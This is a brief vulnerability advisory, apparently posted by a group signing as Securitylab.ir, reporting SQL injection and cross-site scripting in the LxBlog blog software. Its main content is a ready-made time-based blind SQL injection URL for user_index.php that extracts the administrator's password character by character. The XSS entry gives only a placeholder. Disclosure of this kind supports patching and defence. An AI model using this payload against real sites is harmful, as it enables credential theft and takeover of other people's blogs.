|
######################### Securitylab.ir ########################=0D
# Application Info:=0D
# Name: LxBlog=0D
# Website: http://www.lxblog.net=0D
#################################################################=0D
# Discoverd By: Securitylab.ir=0D
# Website: http://securitylab.ir=0D
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir=0D
#################################################################=0D
# Vulnerability Info:=0D
# Type: Sql/Xss=0D
# Risk: Medium=0D
#============================================================0D
# Sql Injection:=0D
# http://site.com/user_index.php?action=tag&job=modify&type=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*&item_type[]=blog k LEFT JOIN pw_user i ON 1=1 WHERE i.uid =1 AND if((ASCII(SUBSTRING(password,1,1))>0),sleep(10),1)/*=0D
#=0D
# Xss:=0D
# http://site.com/user_index.php?action=tag&job=modify&type=[XSS]&item_type[]=[XSS]=0D
#============================================================0D
#################################################################=0D
# Securitylab Security Research Team=0D
###################################################################